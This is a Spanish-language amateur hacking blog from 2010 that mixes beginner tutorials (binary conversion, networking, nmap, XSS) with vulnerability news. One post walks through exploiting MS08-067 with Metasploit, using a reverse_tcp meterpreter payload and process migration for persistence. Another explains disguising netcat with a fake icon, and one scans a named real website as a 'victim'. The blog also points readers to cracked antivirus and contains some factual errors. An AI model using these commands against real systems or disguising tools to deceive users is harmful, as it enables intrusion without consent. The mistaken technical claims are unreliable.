Sysop Shell

Nuevo sitio

2010-07-29T14:16:00.000-07:00

Hola gente, les quiero comentar que mude el blog a otra direccion, pueden visitarnos en:

http://www.bbischol.blogspot.com

Este tiene una nueva inovacion en cuanto al diseño la tematica y un par de agregados como proyectos y cosas asi en las cuales participo ... Saludos

Dr [F]

Mi cumpleaños

2010-03-30T01:26:00.000-07:00

Hola estimados leectores (;P), hacia este post para comentarles que ayer (29 de marzo) fue mi cumpleaños...

Naci el 29/3/1994 a los 15 años nacio mi interes por todo este mundo (lo cual no me arrepiento) :P y supongo que mis conocimientos han hido creciendo y espero que sigan creciendo aun mas hasta llegar al infinito...

Bueno, el fin de este POST es que sepan un poco mas de mi..

Bueno hasta luego...

Pd: Cualquier duda del tuto de pasar de decimal a binario y vicersa preguntar por mensaje o cualquier cosa mandar al mail...

[W]oomD >>

Pasar de binario a decimal y viceversa

2010-03-29T00:11:00.000-07:00

Hola, hoy les traigo un tutorial de como convertir numeros de Decimal a Binario y de decimal a binario

Antes de que leean este tutorial, deben tener conocimientos previos ("unidades" como pueden ser:
Bit, bytes,megabyte,kilobyte,gigabyte,terabyte,etc)

Aca les dejo un mini resumen...

Bit => Un bit representa un cero y un uno (0 y 1), se denota “b”
Nibble => Es equivalente a 4 bits, se denota “N”
Byte => Es equivalente a 8 bits, se denota “B”
Kilobyte => Es equivalente a 1024 bytes, se denota “KB”
Megabyte => Es equivalente a 1024 KB, se denota “MB”
Gigabyte => Es equivalente a 1024 MB, se denota “GB”
Terabyte => Es equivalente a 1024 GB, se denota “TB”
Pentabyte => Es equivalente a 1024 TB, se denota “PB”
Exabyte => Es equivalente a 1024 PB, se denota “EB”
Zettabyte => Es equivalente a 1024 EB, se denota “ZB”
Yottabyte => Es equivalente a 1024 ZB, se denota “YB”
Brontobyte => Es equivalente a 1024 YB, se denota “BB”

Esto sirve de mucho ya que los ordenadores interactuan entre si con numeros binarios ( 0 y 1)

IP: Protocolo de internet (Internet Protocol) se encarga del direccionamiento de datos, sabe de donde viene y hace donde va un archivo/dato determinado

¿Que es una IP?

Es un numero logico que identifica de una manera logica y jerarquica un equipo conectado a internet.

Una direccion IP como nosotros las conocemos, esta compuesta por numeros Hexadecimales como puede ser

201.222.223.123

Pero para las computadoras no son mas que una agrupacion (octeto) de ceros y unos, lo que pretende este texto es enseñarle al leector como pasar esos numeros a ceros y unos y viceversa, comenzemos:

Decimal A binario:

Bueno, esto es muy sencillo

Lo unico que deben saber es:

Dividir,Ordenar, nada mas :P miren:

tenemos este numero: 50 y lo queremos pasar a codigo binario ¿Como hacemos?

Bueno dividimos a 50 por 2 nos da 25 y resto 0 ¿No es asi?
Podriamos decir que el resto nos da nuesta "parte" del numero en binario

numero 50 25 12 6 3 1
resto 0 1 0 0 1 1

Explico: a 50 lo dividimos por 2 nos da resto cero, 50:2 = 25

25    : 2
04      12
1

25: 2 nos da resto 1 y nos da como resultado 12, 12:2 = 6 (resto 0), 6: 2 = 3 resto 0, 3:2 = 1 resto 1, cuando te queda 1 al final, siempre queda resto 1

Se divide por 2 hasta que el numero quede menor a 1...

3    :2
-2     1
1

un ejemplo:

numero: 300

300 150 75 37 18 9 4 2 1
0       0    1    1     0 1 0 0 1

con ordenarlo me referia a que vaya de derecha a izq asi:
Decimal     Binario
   300    =   100101100

veamos otro ejemplo:

numero: 750

750 375 187 93 46 23 11 5 2 1
0     1      1     1    0     1    1   1 0 1

750   =   1011101110

¿Se entendio?

cualquier duda preguntar al msn o en el mismo blog

Pasando de Binario a decimal

Para realizar esta operación usaremos el método de potencias, así que obviamente debemos saber y entender potencias.

En este caso las potencias se utilizan de base 2, con exponente par desde el cero (0), hasta donde podamos llegar por cada cifra correspondiente a la transformación, luego se debe multiplicar por el número binario correspondiente a cada cifra (0 o 1), y finalmente sumar los resultados.

siguiendo con el ejemplo anterior:

750 = 1011101110

0 = 2^0 = 1
1= 2^1 = 2
1= 2^2 = 4
1= 2^3 = 8
0 =2^4 = 16
1 =2^5 = 32
1=2^6 = 64
1=2^7 = 128
0=2^8 = 256
1=2^9 =512

finalmente solo se suman los numeros 1 ej;

2+4+8+32+64+128+512 = 750

tarann.... ! nos dio el mismo numero que antes ... Woow :P

Bueno, eso fue todo

By Woomd...

PD1: Este tutorial, fue realizado a las 4:07 de la madrugada.. sean considerados con los comentarios o con las quejas...:D

Bye

Multiples Vulnerabilidades en google Chrome

2010-03-25T04:18:00.000-07:00

Se han anunciado un total de nueve vulnerabilidades en Google Chrome, el navegador de Google. Un atacante remoto podría emplear estos problemas para evitar restricciones de seguridad, descubrir información sensible o comprometer un sistema vulnerable.

El primer problema se debe a errores de punteros en la sandbox mientras que otro problema se debe a metadatos persistentes como Web Databases y STS. Más problemas se dan porque las cabeceras http se procesan antes de la comprobación de navegación segura (SafeBrowsing).

Una vulnerabilidad de ejecución remota de código se produce al procesar SVG mal construidos. Otro problema de desbordamiento de entero en objetos JavaScript WebKit, también podría emplearse para ejecutar código arbitrario.

Otros problemas están relacionado con los diálogos de autenticación http básica y de descargas. Una última vulnerabilidad reside en el tratamiento de elementos SVG vacíos.

Se recomienda actualizar a Google Chrome versión 4.1.249.1036, disponible

desde:http://www.google.com/chrome

Fuente http://www.foro.portalhacker.net

Disfrasando a NetCat con cualquier Icono

2010-03-22T16:31:00.000-07:00

Hola, aca denuevo.
En esta oportunidad, voy a hacer un tutorial de como disfrasar netcat con cualquier iconito para que no parezca un .exe comun y corriente.

Materiales Necesarios:

NetCat
ResHacker
Pack De Iconos

descargar netcat -----> http://www.megaupload.com/?d=Z1AMQA1T

descargar RESHACKER -----> http://www.megaupload.com/?d=R1O50T2P

Descargar pack iconos -----> http://img191.imageshack.us/img191/7816/55142341.jpg

Bueno comenzemos con este tutorial :D

Primero, voy a explicar como hacer todo detalladamente y luego, colgare algunas screens paso por paso de como se realiza.

En primer lugar abres el ResHacker y le das en File/Open y buscas el nc(netcat). Después pinchas en acción y luego en Add a new Resource, luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5) veras que el netcat tiene el icono de

Paso 2: renombramos nc.exe y desde ahora se llamará “loquequieras.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)

Screens:

By [W]oomD >>

XSS en Web Site

2010-03-19T21:19:00.000-07:00

Hola, me tope hoy con una web vulnerable a XSS y como estaba aburrido decidi postearlo:

¿Que es XSS? (SEGUN WIKI)

Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, Hojas de estilo) Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o Javascript, en el contexto de otro sitio web (y recientemente esto se podría clasificar más correctamente como "distintos orígenes").

Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web No se limita solamente a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada).

Directa (Persistente): este tipo de XSS comúnmente filtrado, y consiste en invadir código HTML peligroso en sitios que así lo permiten

Indirecta (Reflejada): este tipo de XSS consiste en modificar valores que la aplicacion web utiliza para pasar variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podría extenderse al DOM del navegador).

Cookie: Fragmento de informacion que se almacena en el disco duro del visitante de una pagina web a traves de su navegador.

Usos mas frecuentas de Cookies:

Cuando un user ingresa un usuario y contraseña en una web, la cookie almacena los datos asi no tiene que andar escribiendola dia y noche :P

Conseguir Info sobre los datos de navegacion del user

Bueno, aca dejo la screen:

Aclaro, que este tutorial, fue una introduccion a XSS, todavia me falta aprender a mi PHP, asi que todavia no prefiero meterme con WebHacking.. excepto con SqLi xD

NoS VeMoS Dr [F]

MetaSploit FrameWork 3.3

2010-03-14T15:32:00.000-07:00

Hola, este tutorial, es para gente que ya tenga instalado el metasploit framework en su computadora y que sepa el manejo basico de este Soft.

primero:

¿De que se trata la vulnerabilidad MS08_067_NETAPI?

Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.

La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello.

Aca dejo (en forma entera) como explotar la vulnerabilidad y mas abajo lo detallare con fotos.

use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit

y listo ya ingresamos

Bueno Comenzemos explotando la vulnerabilidad:

Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.

Aca cargamos el exploit:

use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103

vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip

Despues de cargar el HOST remoto, cargo el Payload .
en mi caso

set payload windows/meterpreter/reverse_tcp

lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes

y le digo a que maquina quiero que se conecte meterpreter

set LHOST 192.168.1.101

uso el comando exploit para empezar a explotar la vulnerabilidad

Aca esta creando la sesion meterpreter

Sesion meterpreter abierta...

Con el comando ps veo la lista de procesos

y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD

Y ahora migramos a otro proceso el nombre a migrar del procesos

ej: migrate PID

¿se ve ?

migrate 728 que es el proceso del freeze en el ciber :D

y ahora abrire una shell i comprobare que es la Ip 192.168.1.103

Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D

Tutorial By Dr [F]

Microsoft me rio de la seguridad

2010-03-13T18:30:00.000-08:00

Bueno, aca dejo algo que me intereso mucho cuando lo vi, y advierto a cualquier usuario (depaso)

Fuente: Expansión.com

Microsoft alerta sobre el peligro de pulsar F1

"La compañía Microsoft alerta a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda'F1', ya que, de hacerlo, podrían sufrir graves problemas de seguridad.

En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.

Según recoge 'ComputerWorld', en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado. "La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE. Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla 'F1', código arbitrario podría ser ejecutado en el contexto de seguridad del usuario", explica el comunicado de seguridad.

Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP con el navegador Internet Explorer.

Hasta que no este preparado el parche de seguridad, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.

Según publica 'Computer World', un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía "está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes".

Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que "Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes"

Lo mas gracioso de esto, es que MICROSOFT no catalogo la vulnerabilidad como critica porque segun Ellos, el atacante tiene que avisar a la victima que tiene que pulsar una tecla -.-

Saluudos

Dr [F]

Manage Folders 0.1 xD

2010-03-13T16:59:00.000-08:00

Hola, les dejo aca mi nuevo "invento" :P lo hize cuando estaba aburrido

Lo que hace este programita, encripta una carpeta y cuando se cambia de usuario, el otro no la podra abrir....
esta bueno no ?
:P

dejo el code y el .exe

Code

Option Explicit 'obligo a declrar las variables
Dim sisisi As Boolean ' declaro una variable con valo booleano
Dim ruta As String 'declaro una variable ruta con valor de cadnea
Dim sisisi2 As Boolean 'declaro la variable sisisi2 con valor booleano
Dim rut33 As String 'etc

Private Declare Function AnimateWindow Lib "user32" ( _
ByVal hwnd As Long, _
ByVal dwTime As Long, _
ByVal dwFlags As Long) As Long 'declaro la api animatewindow

REM hwnd se aplica a la ventana que quiero aplicar el efecto
rem dwtime es el tiempo en el que sucedera la accion (en milisegundos)
rem dwflags son los valores que permiten indicar que efecto usar y otras propiedades como la orientación del efecto, es decir que vaya apareciendo desde el medio , del lado izq al derecho con efecto fade o transparencia, etc

Private Const AW_ACTIVATE = &H20000 'constante que indica que despues se active la ventana
Private Const AW_BLEND = &H80000 ' constante que indica la transparencia

Private Declare Function EncryptFile Lib "ADVAPI32" Alias "EncryptFileA" ( _
ByVal lpfilename As String) As Boolean 'declaro api para encriptar archivos

Private Declare Function DecryptFile Lib "ADVAPI32" Alias "DecryptFileA" ( _
ByVal lpfilename As String, _
ByVal dwreserved As Long) As Long 'api para desencriptar archivos

Public Function encriptar_archivos(ByVal ruta1 As String) As Boolean 'declaro una funcion con la variable ruta1
encriptar_archivos = EncryptFile(ruta1) 'digo que la funcion sea = a la api
End Function

Public Function desencriptar_archivos(ByVal ruta2 As String) As Boolean 'declaro funcion y la var ruta2
desencriptar_archivos = DecryptFile(ruta2, 0) 'digo que la funcion sea = a la api pero esta vez con la opearcion inversa (0)
End Function

Private Sub command1_click() 'al hacer click
ruta = InputBox("Ruta del Archivo a encriptar: ", "By Dr [F]", "Aca") ' digo que la variable ruta sea el inputbox
sisisi = encriptar_archivos(ruta) 'sisisi = se aplica la funcion desencriptar en la ruta
If sisisi Then ' si sisisi nada entonces
MsgBox "Archivos Encriptado Satisfactoriamente", vbInformation, "Good" 'este mensaje
Else ' de lo contrario
MsgBox Err.Description 'el error que haya sucedido
End If

End Sub

Private Sub command2_click()
rut33 = InputBox("Ruta del Archivo a desencriptar: ", "By Dr [F]", "Aca")
sisisi2 = desencriptar_archivos(rut33)
If sisisi2 Then
MsgBox "Archivos desencriptado satisfactoriamente", vbInformation, "Good"
Else
MsgBox Err.Description, vbCritical, "Error"
End If
Rem lo mismo
End Sub

Private Sub form_load()
Me.Caption = "Manage Folder v 0.1 xD"
Dim lala As Long
lala = AnimateWindow(Me.hwnd, 700, AW_BLEND Or AW_ACTIVATE)
Command1.Caption = "Encriptar"
Command2.Caption = "Desencriptar"
Command1.BackColor = vbGreen
Command2.BackColor = vbGreen
End Sub

Aca dejo el .exe no tengo ganas de analizarlo ... analisenlo uds, asi depaso se acostumbran

lo pueden analisar aca:
http://scanner.novirusthanks.org/

.exe:

Descargar

By Dr [F]

Contador de Lineas

2010-03-13T06:51:00.000-08:00

Bueno, aca les dejo mi contador de Lineas en visual basic 6, este programa es muy facil de usar y sencillo, adicto a los contadores de las lineas de los codes :P

Aca ----------> programa contadirlineas.exe

Aca ---------> Codigo.. viene en un .txt

Analisis con Novirus thanks para los desconfiados -.-

Report date:	2010-03-13 15:50:35 (GMT 1)
File name:	Contadorlineas.exe
File size:	20480 bytes
MD5 hash:	82aae17fbfe11d2079622221fdd98536
SHA1 hash:	5cd72b84fbf9fd0f586d1cae9bb7b66a1eec9733
Detection rate:	0 on 21 (0%)
Status:	CLEAN

Antivirus	Database	Engine	Result
a-squared	13/03/2010	4.5.0.8	-
Avast	100313-0	4.8.1368	-
AVG	271.1.1/2720	9.0.0.725	-
Avira AntiVir	7.10.4.188	7.6.0.59	-
BitDefender	13/03/2010	7.0.0.2555	-
ClamAV	03/03/2010	0.95.3	-
Comodo	3468	3.13.579	-
Dr.Web	13/03/2010	5.0	-
Ewido	13/03/2010	-	-
F-PROT6	20100312	6.3.3.4884	-
G-Data	19.9309	2.0.7309.847	-
Ikarus T3	03/03/2010	1001074	-
Kaspersky	13/03/2010	9.0.0.736	-
McAfee	03/03/2010	5.1.0.0	-
NOD32	4940	4.0.474	-
Panda	02/03/2010	9.5.2	-
Solo	13/03/2010	8.0	-
TrendMicro	887(688700)	1.1-1001	-
VBA32	13/03/2010	3.12.12.2	-
VirusBuster		1.5.5.0	-
Zoner	13/03/2010	0.2	-

Escanear Objetivo Con Nmap

2010-03-12T12:01:00.000-08:00

Hola, en esta oportunidad, les enseñare a hacer una exploracion del sistema que estemos por atacar con nuestro querido NMAP...

Primero un poco de definicion:

¿Que es Nmap?

Nmap es un programa de code abierto que sirve para efectuar rastro de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Fuente Wikipedia

PD: Aclaro que para entender un poco mas del NMAP, es necesario comprender basicamente el PROTOCOLO TCP/IP Y algo de REDES, en el blog hay muy buena info.

Bueno, empezemos...

Lo unico que necesitaremos, sera el nmap que lo podremos conseguir aqui:

http://download.insecure.org/nmap/dist/nmap-4.20-setup.exe

Lo instalamos en el Disco Raiz

Bueno cuando este todo listo, nos dirigiremos a nuestra preciada consola de comandos:

Bueno, lo primero que haremos con nuestro NMAP, sera realizar un tipo de escaneo basico a una web objetivo (la que quieran). yo por mi parte se lo hare a www.pasionverdolaga.com.ar

Con este tipo de escaneo:

nmap

nos saldran los puertos abiertos que tiene el servidor en que se aloja la web

¿Ven ?

Ahora con la opcion -O del nmap, podremos saber o estar casi seguros del Sistema Operativo que utiliza nuestra victima, y ademas nos dara los puertos abiertos.

nmap -O o nmap -O

Miremos la informacio que nos tira.

Nos dice que es probable que el sistema operativo sea Linux 92% seguro , vemos las versiones de LINUX..

Tambien vemos que por el medio hay un router y un firewall. esto es medio dificil de enteder, pero se aprende leyendo :D

Con el comando -sT, veremos, si la IP es dinamica o no...

ejecutamos...

nmap -sT o nmap -sT

y vemos si es dinamica o estatica

Despues podemos ver los servicios que corren en la web con el comando -sV

ponemos

nmap -sV www.web.com.ar

Ahi vemos la version del FTP: PROFTPD... si tubiera algun otro servicio corriendo bajo algun programa apareceria la version, esto es muy util a la hora de hacer, buscar exploits.

Si el destino, tiene un Firewall, que no acpeta peticiones entrantes (que bloquea pings) tendremos que usar la opcion -P0 asi nuestro escaneo no manda PINGS al destino.

ej:

nmap -P0 -O -Sv www.web.com.ar

Ese seria un escaneo completo, ya que en caso de que bloqueara los pings, estariamos evadiendo el firewall, estariamos escaneando el sistema operativo, y los servicios que corren en el...

Probemos:

Vemos un router linksys... y nmap nos dice que es un SO Unix... (muchos bugs :P)

Tambien podemos decirle a nmap que agregue mas informacion, con el modo verbose -vv (se acordaran de ncat :P)

esto se usa asi:

nmap -O -sV -vv www.web.com.ar

Como vemos nos da mucha mas info, pero lamentablemente, a mi no me entro en la pantalla :P

Bueno, ahora no pondre mas fotos, porque creo que si sigo asi le voi a hacer overflow a imageshack.us :P

sigamos con algunos comandos para escanear redes... LAN

nmap -sV 192.168.0.1-254 -P0 -vv -p1 - 25000

Con ese comando le estamos diciendo a nmap, que nos de informacion de los servicios de el rango de red 192.168.0.1 al 192.168.0.254. Que agrege info con vv y que recorra los puertos del 1 al 25000

Bueno, eso es todo por hoy, si quieren saber mas comandos del NMAP vasta con ir a la consola y poner

nmap y darle a enter, saldran una lista de comandos.

Listo lala....

PD: 100% echo por mi

Saluda: Dr [F]

REDES

2010-03-12T09:38:00.000-08:00

Aclaro, que este es un tutorial basico, para entender como funcionan las redes. Despues de este, subire algo de TOPOLOGIA.

Recomendaciones: Recomiendo tener leeido el tutorial que hay en el blog del Protocolo Tcp/IP (que es muy bueno)

¿Que es una red?

Una red informatica, es un conjunto de computadoras conectadas entre si compartiendo recursos fisicos como por ejemplo: Impresoras, Leectoras de Cd-ROM, etc y recursos logicos, como pueden ser programas, conexiones a internet, etc.

Podemos clasificar los tipos de redes teniendo en cuenta distintos criterios:

*Alcance

*Seguridad

etc

LAN: Local area network o Red de Area Local

Es la interconexion de varios ordenadores y perisfericos. Su extension esta limitada a edificios y a oficinas.

Su aplicacion mas extendida, es la interconexion de ordenadores personales y estaciones de trabajo en oficinas fabricas, etc para compartir recursos o intercambiar datos.

MAN: Metropolitan Area NetWork o Red de Area metropolitana

Son aquellas redes cuya extension es mayor que la de una red Lan generalmente abarcan ciudades.

Sub velocidad (banda ancha) proporciona capacidad de integracion de multiples servicios mediante transmision de datos voz, video, sobre medios tales como fibra optica y par trenzado.

La tecnologia de pares de cobre se posiciona como una excelente alternativa para la creacion de redes metropolitana por su baja latencia (ping) (45 ms)

Las redes MAN BUCLE (en vez de fibra optica, par trenzado) ofrecen velocidad de 10 MBPS, 20MBPS, 45MBPS y 75 MPFS sobre pares de cobre y 100 MBPS 1 GPS Y 10 GPS mediante fibra optica.

Habra que hacer una MAN BUCLE :D

RED WLAN

Sistema de comunicacion de datos inalambricos, muy utilizado como alternativa a las redes lan cableadas

Utiliza tecnologia de radio frecuencia que permite mas movilidad por parte del usuario al minimizar las condiciones del cableado

Conexion a internet:

Las principales conexiones a internet son:

Conexion Dial-Up

Conexion que consiste en un modem que se conecta al telefono. El modem realiza una llamada al servidor que se encuentra conectado a nuestra linea telefonica y brinda el acceso a internet.

La velocidad promedio de transferencia es de 10 kbit/s la cual puede disminuir en caso de ruido en la linea.

Desventajas (en mi opinion excepto que tengas suegra):

Opcupa la linea telefonica

Dificulta jugar juegos en linea (on line) y video conferencias.

Conexion ADSL:

es acronimo de Asymetric digital systematic line

Tecnologia que utiliza el telefono para conectarse a internet, pero aprovechando que las señales utilizan bajas frecuencias.

Utiliza especto libre ---> Que posee ancho de banda de 1 GHZ sin perjudircar la linea telefonica.

El usuario recibe señales de internet y del telefono por la misma linea, es por eso, que se utiliza un splitter que separa las señales enviandolas

Señales del telefono ------ > telefono

señales de internet ------> Internet

La utilizacion de un splitter, tambien es importante, debido a que atenua el ruido en la linea cuando suena el telefono evitando la caida de internet

Conexion Cable Modem:

A diferencia de Dial-UP y ADSL, esto no se conecta al telefono para poder tener acceso a internet.

Si no que utiliza el cable coaxial del televisor.

La informacion de internet y del televisor, viajan por el mismo cable, pero al utilizar distintas frecuencias pueden compartir el canal

Ejemplo de MODEM motorolla SURF BOARd

Conexion WIFI:

Esta tecnologia, utiliza como medio el aire, wifi significa fidelidad sin cables. Envia datos de la misma manera que las señales de radio (varia brevemente la frecuencia para no causar interferencia)

WIFI: se caracteriza por no necesitar cables para su conexion.

Desventajas:

Como todos saben la seguridad.

Cualquier persona que tenga un equipo con wifi puede acceder a cualquier red (claro que no este protegida con una contraseña estilo WPA2). Lo que mas se recomiendan son tecnicas de cifrado...

Pero tambien existen Crackers de MD5 y distintos algoritmos que permiten crackear practicamente cualquier cosa... Es mas hace poco, salio una noticia, que lograron romper el cifrado de 120 bits o algo asi...

Estubieron 4 dias y todas nuestras conexiones, ya sea el cifrado de hotmail y distintas cosas se basaban en ese algoritmo, asi que fritos :P

Bueno, con respecto a robar datos por la red, recomiendo leer el protocolo TCP/IP ya que tiene apartados muy interesantes como el Protocolo ARP (muajaja) el IP y una capa llamada capa de transporte y capa de red me parecieron muy interesantes

PD: Todo este texto o el 90 % es de mi profesor de computacion ...

Espero que lo hayan disfrutado :D

Aclaro que esto ya lo sabia, lo use para que este bien redactado, y un repaso nunca viene nada mal

Despues hare un tutorial de las topologias de las redes ..

Un saludo

Dr [F]

Y el ganador es....

2010-03-07T02:28:00.000-08:00

Hola, tanto tiempo. Espero que la falta de gente en este blog no los halla desanimado a seguir con su objetivo (juankear google :P).

Antes que nada, disculpen por la ausencia mia en este blog, es que he estado muy ocupado, aprendiendo y aprendiendo cosas.

Bueno, como han visto (la encuesta) Gano Visual Basic, y estubo muy peleado con C...
pero un ganador es un ganador :P

En los proximos 2 dias sacare un tutorial (intermedio) se podria decir de visual Basic 6

Nos vemos sysopsheros

Listado de Antivirus y Firewalls

2010-03-04T12:46:00.000-08:00

Bueno gente, soy Sthefano02 y tengo la palabra de Dr F que una vez me dijo que podia publicar entradas cuando quiera xD jajajaja ya paso tiempo desde que no hablo con el, pero ahora empezamos a hablar de nuevo. Bueno, llendo al tema. Estube armando un listado de post, en los cuales hay antivirus y un par de los mejores firewalls para descargar. Aqui se los dejo:

AVG Anti-Virus Free 9.0.730

Comodo Internet Security 3.14.130099.587 (este es antivirus y firewall a la vez, yo les sugiero desactivar este AV y poner otro, y usar este firewall que es muy bueno)

Nueva version Panda Cloud Antivirus

Bit Defender 2009+Medicina

Kaspersky Virus Removal Tool

Spy Emergency 7.0.605.0

Ad-Aware Free 8.2.0 [Español]

SuperAntiSpyware 4.34.0.1000

Malwarebytes Anti-Malware 1.34 Final

ZoneAlarm Free Firewall 9.1.007.004

Ashampoo Anti-Malware 1.02

Eset Security Antivirus gratis hasta el año 2049

OutPost Firewall Pro 2009 Build 6.7

Trojan Remover 6.7.9 Build 2582 - Final - Full

Aqui tenemos la clase de repaso para los que no saben jeje :P

¿Que es un antivirus?

Es un programa que se encarga de buscar, detectar y eliminar codigos maliciosos (malware) cuya intencion puede llegar a ser robar informacion de nuestro PC o simplemente dañarlo.

¿Que es un Firewall?
como lo dice su nombre, Fire viene de fuego y Wall de muralla. Estos programas hacen una barrera bloqueando las conexiones entrantes a nuestro PC y preguntandonos si queremos dejarla pasar o no. Son muy utiles ya que evitamos que otras personas se metan en nuestro PC, y evitamos posibles ataques.

¿A que llamamos Antivirus Residente y No residente?
Antivirus residente es el nombre que se les da a los antivirus que estan en constante proteccion de nuestro sistema, serian los que podemos ver en la barra de tareas, en la parte derecha (donde estan todos los iconos).

Por otro lado, obviamente, estan los Antivirus No residententes. Que son los que se usan para realizar analisis aparte. Osea que estos solo analizaran nuestro PC y listo, no se quedaran protegiendolo como los Residentes.

Bueno, yo les recomiendo usar como FW el "Comodo" o el "ZoneAlarm", y como AV residente el Eset hasta el 2049, despues para no residentes les conviene descargarse 3 o 4 y analizar con esos. Saludos a todos, Sthefano02.

Vacaciones...

2010-02-18T14:47:00.000-08:00

Mis queridos lectores: Lamento no poder escribir mas hasta el 3 de marzo (3/03/2010), debido a que me encuentro de vacaciones.
Para escribir esto, me hize un tiempito, al que tambien dedique a aclarar algunas duditas de VB.. y me estoy aprovechando de un ciber, que tiene el radmin en todas las pcs (sin contraseña para user comunes)..

Bueno, espero que no baje el rendimiento del blog... :d y a ver si se ponen las pilas con el tema de los comentarios:

Para cuando vuelva tengo un juego planeado...
El tema que gane la encuesta, hare un apartado especial que trate el tema ganado..
Bueno, me despido. Hasta el 3 de marzo :d

PD: Haace 4 dias que ya estoy de vacaciones :P

PD2: Pagina redireccionada :P

Boletines de Seguridad Microsoft Febrero

2010-02-11T13:38:00.000-08:00

este martes Microsoft ha publicado trece boletines de seguridad (del MS10-003 al MS10-015) correspondientes a su ciclo habitual de actualizaciones. Según la propia clasificación de Microsoft cinco de los boletines presentan un nivel de gravedad "crítico", siete son clasificados como "importantes" y el restante se considera "moderado". En total se han resuelto 25 vulnerabilidades, una de ellas reportada por Hispasec.

Los boletines "críticos" son:

MS10-006: Actualización para corregir dos vulnerabilidades en el cliente SMB que podrían permitir la ejecución remota de código si un atacante envía una respuesta SMB especialmente creada a una petición de cliente SMB. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
MS10-007: Actualización destinada a corregir una vulnerabilidad en el controlador del shell de Windows que podría permitir la ejecución remota de código arbitrario, el problema reside en la validación incorrecta de la entrada enviada a la función de la API ShellExecute. Afecta a Microsoft Windows 2000, Windows XP y Windows Server 2003.
MS10-008: Se trata de una actualización de seguridad acumulativa de bits de interrupción de ActiveX que además corrige una vulnerabilidad de ejecución remota de código en el control ActiveX de Microsoft Data Analyzer. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
MS10-009: Boletín destinado a corregir cuatro vulnerabilidades en TCP/IP de Windows, la más grave de ellas podría permitir la ejecución remota de código si se envían paquetes especialmente diseñados a un equipo con IPv6 habilitado. Afecta a Microsoft Windows Windows Vista y Windows Server 2008.
MS10-013: Actualización destinada a corregir una vulnerabilidad en Microsoft DirectShow relacionada con la forma en que se analizan los archivos AVI. Esta vulnerabilidad podría permitir la ejecución remota de código arbitrario si un usuario abre un archivo AVI especialmente creado. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.

Los boletines clasificados como "importantes" son:

MS10-003: Actualización que soluciona una vulnerabilidad en Microsoft Office que podría permitir la ejecución remota de código si un usuario abre un archivo de Office especialmente diseñado. Afecta a Microsoft Office XP y Microsoft Office 2004 para Mac.
MS10-004: Actualización que soluciona seis vulnerabilidades en Microsoft Office PowerPoint, que podrían permitir la ejecución remota de código si un usuario abre un archivo Power Point especialmente creado. Afecta a Microsoft Office XP, 2003 y Microsoft Office 2004 para Mac.
